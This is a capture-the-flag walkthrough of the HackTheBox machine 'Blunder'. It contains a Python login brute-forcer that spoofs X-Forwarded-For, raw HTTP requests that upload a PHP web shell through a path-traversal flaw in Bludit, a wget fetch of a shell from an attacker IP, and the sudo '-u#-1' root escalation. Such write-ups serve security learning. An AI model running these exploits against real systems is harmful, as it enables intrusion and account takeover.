Blunder: HackTheBox

  • Directory busting to get the admin portal and todo.txt file.
  • Brute force password.
  • Exploit the file upload vulnerability to get the shell.
  • Enumerate the machine to escalate privilege.
  • Find exploits to bypass the restricted ability.

Nmap

# nmap -T4 -p- -A -o nmap 10.10.10.191
Nmap scan report for 10.10.10.191
Host is up (0.16s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
21/tcp closed ftp
80/tcp open http
Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Blunder
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts
Aggressive OS guesses: HP P2000 G3 NAS device (91%), Linux 2.6.32 (90%), Linux 2.6.32 - 3.1 (90%), Infomir MAG-250 set-top box (90%), Ubiquiti AirMax NanoStation WAP (Linux 2.6.32) (90%), Linux 3.7 (90%), Ubiquiti AirOS 5.5.9 (90%), Ubiquiti Pico Station WAP (AirOS 5.2.6) (89%), Linux 2.6.32 - 3.13 (89%), Linux 3.0 - 3.2 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
-T4 : 4 threads
-p- : scan all the ports
-A : OS detection, version detection, traceroute
-o : Output scan result if file

Port 80

Directory busting

$ gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.191 -x php,txt -o dirs
/about (Status: 200)
/0 (Status: 200)
/admin (Status: 301)
/install.php (Status: 200)
/empty (Status: 200)
/robots.txt (Status: 200)
/todo.txt (Status: 200)
/usb (Status: 200)
/LICENSE (Status: 200)
-w : wordlist
-u : URL
-x : File extension to search for
-o : Output file to write results
-Update the CMS
-Turn off FTP - DONE
-Remove old users - DONE
-Inform fergus that the new blog needs images - PENDING
$ cewl -w ro.txt http://10.10.10.191
#!/usr/bin/env python3
import re
import requests
host = 'http://10.10.10.191'
login_url = host + '/admin/'
username = 'fergus'
wordlist = []
# Generate 50 incorrect passwords
#for i in range(50):
# wordlist.append('Password{i}'.format(i = i))
# Add the correct password to the end of the list
#wordlist.append('adminadmin')
f=open("wordlists")
for data in f.readlines():
wordlist.append(data.strip())
for password in wordlist:
session = requests.Session()
login_page = session.get(login_url)
csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)
print('[*] Trying: {p}'.format(p = password))headers = {
'X-Forwarded-For': password,
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
'Referer': login_url
}
data = {
'tokenCSRF': csrf_token,
'username': username,
'password': password,
'save': ''
}
login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False)if 'location' in login_result.headers:
if '/admin/dashboard' in login_result.headers['location']:
print()
print('SUCCESS: Password found!')
print('Use {u}:{p} to login.'.format(u = username, p = password))
print()
break
fergus : RolandDeschain
http://10.10.10.191/admin/about
POST /admin/ajax/upload-images HTTP/1.1
Host: 10.10.10.191
Content-Length: 27550
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvdbAfQfvdjrTLooA
Origin: http://10.10.10.191
Referer: http://10.10.10.191/admin/new-content
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,fr;q=0.8
Cookie: BLUDIT-KEY=q5604mab2r7h11hua34crtng26
Connection: close
------WebKitFormBoundaryvdbAfQfvdjrTLooA
Content-Disposition: form-data; name="images[]"; filename="bear.jpg"
Content-Type: image/jpeg
//imagedata
------WebKitFormBoundaryvdbAfQfvdjrTLooA
Content-Disposition: form-data; name="uuid"
7f974f44bd782ce95b7822da7bfea72a
------WebKitFormBoundaryvdbAfQfvdjrTLooA
Content-Disposition: form-data; name="tokenCSRF"
3932e46b872ca59f022dd197c1b03b60b9f0d2c0
------WebKitFormBoundaryvdbAfQfvdjrTLooA--
http://10.10.10.191/bl-content/uploads/pages/uuid-value
http://10.10.10.191/bl-content/tmp/temp/
POST /admin/ajax/upload-images HTTP/1.1
Host: 10.10.10.191
Content-Length: 456
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvdbAfQfvdjrTLooA
Origin: http://10.10.10.191
Referer: http://10.10.10.191/admin/new-content
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,fr;q=0.8
Cookie: BLUDIT-KEY=q5604mab2r7h11hua34crtng26
Connection: close
------WebKitFormBoundaryvdbAfQfvdjrTLooA
Content-Disposition: form-data; name="images[]"; filename="evil.jpg"
Content-Type: image/jpeg
<?php system($_GET['cmd'])'?>
------WebKitFormBoundaryvdbAfQfvdjrTLooA
Content-Disposition: form-data; name="uuid"
../../tmp/temp
------WebKitFormBoundaryvdbAfQfvdjrTLooA
Content-Disposition: form-data; name="tokenCSRF"
3932e46b872ca59f022dd197c1b03b60b9f0d2c0
------WebKitFormBoundaryvdbAfQfvdjrTLooA--
HTTP/1.1 200 OK
Date: Thu, 13 Aug 2020 17:00:04 GMT
Server: Apache/2.4.41 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 63
Connection: close
Content-Type: application/json
{"status":0,"message":"Images uploaded.","images":["evil.jpg"]}
POST /admin/ajax/upload-images HTTP/1.1
Host: 10.10.10.191
Content-Length: 456
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvdbAfQfvdjrTLooA
Origin: http://10.10.10.191
Referer: http://10.10.10.191/admin/new-content
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,fr;q=0.8
Cookie: BLUDIT-KEY=q5604mab2r7h11hua34crtng26
Connection: close
------WebKitFormBoundaryvdbAfQfvdjrTLooA
Content-Disposition: form-data; name="images[]"; filename=".htaccess"
Content-Type: image/jpeg
RewriteEngine Off
AddType application/x-httpd-php .jpg

------WebKitFormBoundaryvdbAfQfvdjrTLooA
Content-Disposition: form-data; name="uuid"
../../tmp/temp
------WebKitFormBoundaryvdbAfQfvdjrTLooA
Content-Disposition: form-data; name="tokenCSRF"
3932e46b872ca59f022dd197c1b03b60b9f0d2c0
------WebKitFormBoundaryvdbAfQfvdjrTLooA--
HTTP/1.1 200 OK
Date: Thu, 13 Aug 2020 17:06:55 GMT
Server: Apache/2.4.41 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 92
Connection: close
Content-Type: application/json
{"status":1,"message":"File type is not supported. Allowed types: gif, png, jpg, jpeg, svg"}
http://10.10.10.191/bl-content/tmp/temp/evil.jpg?cmd=whoamiwww-data
http://10.10.10.191/bl-content/tmp/uploaded-php-file

Getting Shell

http://10.10.10.191/bl-content/tmp/temp/evil.jpg?cmd=wget%2010.10.14.192:8000/sh.php
drwxr-xr-x  5 root     root     4096 Nov 28  2019 .
drwxr-xr-x 15 root root 4096 Nov 27 2019 ..
drwxr-xr-x 8 www-data www-data 4096 May 19 15:13 bludit-3.10.0a
drwxrwxr-x 8 www-data www-data 4096 Apr 28 12:18 bludit-3.9.2
drwxr-xr-x 2 root root 4096 Nov 28 2019 html
<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
"admin": {
"nickname": "Hugo",
"firstName": "Hugo",
"lastName": "",
"role": "User",
"password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",
"email": "",
"registered": "2019-11-27 07:40:55",
"tokenRemember": "",
"tokenAuth": "b380cb62057e9da47afce66b4615107d",
"tokenAuthTTL": "2009-03-15 14:00",
"twitter": "",
"facebook": "",
"instagram": "",
"codepen": "",
"linkedin": "",
"github": "",
"gitlab": ""}
}
$ su hugo
Password : Password123
$ /bin/bash
hugo@blunder:~$ wc user.txt
1 1 33 user.txt

Root

hugo@blunder:~$ sudo -u#-1 /bin/bash
sudo -u#-1 /bin/bash
root@blunder:/home/hugo#

--

--

--

Infosec Enthusiast

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Importance of Cyber Security in Organizations By Mann Bajpai

DevOps Security Is As Disruptive As It Is Uncomfortable

{UPDATE} Slots by GameHouse Hack Free Resources Generator

Two Things Every Community Needs to Stop Crime 273% Better

iPhone Theft in Barcelona: How it Was + Security Tips Thieves Hate

How to protect your passwords from hackers?

How I Lost It All… And Then Found DRIP

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Roshan Guragain

Roshan Guragain

Infosec Enthusiast

More from Medium

PROJECT HIVE

DataWeave : map()

Adapt.

Because font doesn’t have color, you need a panel to make a backgound color and give the…